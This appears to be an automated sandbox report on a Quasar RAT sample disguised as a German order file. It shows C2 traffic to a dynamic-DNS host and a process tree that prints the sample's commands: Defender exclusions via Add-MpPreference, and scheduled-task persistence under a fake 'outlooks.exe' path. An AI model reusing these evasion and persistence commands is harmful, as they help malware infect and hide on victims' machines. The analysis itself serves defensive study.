Dec 3, 2024 14:53:52.933974981 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:53:53.161572933 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:53:55.399147034 CET | 49716 | 443 | 192.168.2.8 | 103.126.138.87
Dec 3, 2024 14:53:55.399193048 CET | 443 | 49716 | 103.126.138.87 | 192.168.2.8
Dec 3, 2024 14:53:55.399472952 CET | 49716 | 443 | 192.168.2.8 | 103.126.138.87
Dec 3, 2024 14:53:55.400734901 CET | 49716 | 443 | 192.168.2.8 | 103.126.138.87
Dec 3, 2024 14:53:55.400746107 CET | 443 | 49716 | 103.126.138.87 | 192.168.2.8
Dec 3, 2024 14:53:57.671169043 CET | 443 | 49716 | 103.126.138.87 | 192.168.2.8
Dec 3, 2024 14:53:57.671238899 CET | 49716 | 443 | 192.168.2.8 | 103.126.138.87
Dec 3, 2024 14:53:57.675523996 CET | 49716 | 443 | 192.168.2.8 | 103.126.138.87
Dec 3, 2024 14:53:57.675538063 CET | 443 | 49716 | 103.126.138.87 | 192.168.2.8
Dec 3, 2024 14:53:57.675784111 CET | 443 | 49716 | 103.126.138.87 | 192.168.2.8
Dec 3, 2024 14:53:57.712079048 CET | 49716 | 443 | 192.168.2.8 | 103.126.138.87
Dec 3, 2024 14:53:57.755331039 CET | 443 | 49716 | 103.126.138.87 | 192.168.2.8
Dec 3, 2024 14:53:58.268071890 CET | 443 | 49716 | 103.126.138.87 | 192.168.2.8
Dec 3, 2024 14:53:58.268157005 CET | 443 | 49716 | 103.126.138.87 | 192.168.2.8
Dec 3, 2024 14:53:58.268219948 CET | 49716 | 443 | 192.168.2.8 | 103.126.138.87
Dec 3, 2024 14:53:58.626985073 CET | 49716 | 443 | 192.168.2.8 | 103.126.138.87
Dec 3, 2024 14:53:58.878453970 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:53:58.998687983 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:53:58.998745918 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:53:59.121752024 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:53:59.438152075 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:53:59.491687059 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:53:59.629101992 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:53:59.702174902 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:54:24.630366087 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:54:24.750422955 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:54:49.755800962 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:54:49.876039982 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:55:15.010006905 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:55:15.129926920 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:55:40.177249908 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:55:40.297209024 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:56:05.364789963 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:56:05.487390041 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:56:30.489820957 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:56:30.610080004 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:56:55.692991018 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:56:55.813019991 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:57:20.927375078 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:57:21.048914909 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:57:46.052442074 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:57:46.172563076 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 14:53:50.460360050 CET | 62361 | 53 | 192.168.2.8 | 1.1.1.1
Dec 3, 2024 14:53:51.009383917 CET | 53 | 62361 | 1.1.1.1 | 192.168.2.8
Dec 3, 2024 14:53:55.256530046 CET | 63175 | 53 | 192.168.2.8 | 1.1.1.1
Dec 3, 2024 14:53:55.394778013 CET | 53 | 63175 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 14:53:50.460360050 CET | 192.168.2.8 | 1.1.1.1 | 0x64ec | Standard query (0) | hoffmann3.ydns.eu | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:55.256530046 CET | 192.168.2.8 | 1.1.1.1 | 0xad0c | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 14:53:51.009383917 CET | 1.1.1.1 | 192.168.2.8 | 0x64ec | No error (0) | hoffmann3.ydns.eu | | 193.34.212.17 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:53.205018997 CET | 1.1.1.1 | 192.168.2.8 | 0x93e2 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:53.205018997 CET | 1.1.1.1 | 192.168.2.8 | 0x93e2 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:55.394778013 CET | 1.1.1.1 | 192.168.2.8 | 0xad0c | No error (0) | ipwho.is | | 103.126.138.87 | A (IP address) | IN (0x0001) | false
                                                                          • ipwho.is
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49716 | 103.126.138.87 | 443 | 6088 | C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 13:53:57 UTC | 150 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Host: ipwho.is
Connection: Keep-Alive
2024-12-03 13:53:58 UTC | 223 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 13:53:57 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Server: ipwhois
Access-Control-Allow-Headers: *
X-Robots-Tag: noindex
2024-12-03 13:53:58 UTC | 1021 | IN | Data Raw: 33 66 31 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f
Data Ascii: 3f1{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.228", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yo


                                                                          Target ID:0
                                                                          Start time:08:53:33
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                                                                          Imagebase:0x2d0000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:08:53:36
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:08:53:37
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                                                                          Imagebase:0xb50000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:08:53:39
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                                          Imagebase:0x40000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 47%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:08:53:40
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:08:53:40
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:08:53:40
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xc90000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 47%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:08:53:41
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Imagebase:0xc40000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:16
                                                                          Start time:08:53:43
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:18
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:19
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp"
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:20
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:08:53:44
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:22
                                                                          Start time:08:53:45
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xcc0000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Has exited:false

                                                                          Target ID:23
                                                                          Start time:08:53:48
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:08:53:48
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:26
                                                                          Start time:08:53:55
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp"
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:27
                                                                          Start time:08:53:55
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:28
                                                                          Start time:08:53:55
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:29
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:30
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                                                                          Imagebase:0xb90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:31
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:32
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp"
                                                                          Imagebase:0xf30000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:33
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:34
                                                                          Start time:08:53:56
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                                                                          Imagebase:0x7d0000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:35
                                                                          Start time:08:53:57
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                                                                          Imagebase:0xb40000
                                                                          File size:3'842'568 bytes
                                                                          MD5 hash:15F259B30EC72A5217144834F7F5B564
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                            Execution Graph

                                                                            Execution Coverage:13.5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:1.8%
                                                                            Total number of Nodes:278
                                                                            Total number of Limit Nodes:12
Strings
Memory Dump Source
